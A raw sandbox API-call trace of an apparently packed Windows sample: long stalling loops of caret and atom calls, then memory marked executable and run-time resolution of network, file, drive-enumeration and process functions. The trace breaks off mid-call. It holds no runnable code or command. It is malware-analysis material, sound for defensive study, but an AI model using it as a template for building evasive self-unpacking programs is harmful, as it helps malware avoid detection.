0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.369] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.369] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.370] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.370] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.371] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.371] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.372] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.372] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.373] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.373] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0162.240] lstrcpyW (in: lpString1=0x5519c0, lpString2="VirtualProtect" | out: lpString1="VirtualProtect") returned="VirtualProtect" [0162.241] LocalAlloc (uFlags=0x0, uBytes=0x90de0) returned 0x1c90020 [0162.285] VirtualProtect (in: lpAddress=0x1c90020, dwSize=0x90de0, flNewProtect=0x40, lpflOldProtect=0x18e930 | out: lpflOldProtect=0x18e930*=0x4) returned 1 [0162.353] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0162.353] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0162.353] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0162.354] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0162.354] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0162.354] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0162.354] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0162.354] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0162.354] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0162.358] Module32First (hSnapshot=0x58, lpme=0x18eac4) returned 1 [0162.360] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1d30000 [0162.411] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0162.411] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0162.411] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0162.411] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0162.411] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0162.411] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0162.412] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0162.412] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0162.412] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0162.412] SetErrorMode (uMode=0x400) returned 0x0 [0162.412] SetErrorMode (uMode=0x0) returned 0x400 [0162.412] GetVersionExA (in: lpVersionInformation=0x18d9f4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18d9f4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0162.412] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e50000 [0162.434] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ea7c | out: lpflOldProtect=0x18ea7c*=0x2) returned 1 [0162.818] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0162.818] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0162.818] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0162.819] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0162.819] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0162.819] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0162.819] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0162.825] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0162.826] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0162.826] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0162.826] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0162.846] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0162.846] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0162.846] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0162.846] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0162.846] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0162.846] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0162.846] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0162.846] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0162.850] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0162.850] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0162.851] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0162.851] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0162.851] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0162.851] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0162.851] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0162.851] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0162.851] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0162.851] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0162.852] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0162.852] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0162.852] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0162.852] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0162.852] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0162.852] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0162.852] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0162.852] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0162.853] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0162.854] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0162.855] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0162.856] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0162.857] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0162.858] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0162.859] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0162.859] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0162.859] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0162.859] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0162.859] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0162.860] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0162.860] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0162.860] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0162.860] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0162.860] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0162.860] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0162.860] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0162.860] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0162.861] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0162.862] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0162.862] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0162.862] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0162.862] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0162.862] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0162.862] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0162.862] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0162.862] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0162.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0162.864] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0162.865] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0162.866] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0162.866] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0162.866] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0162.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0162.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0162.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0162.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0162.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0162.866] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0162.866] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0162.867] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0162.867] GetProcAddress 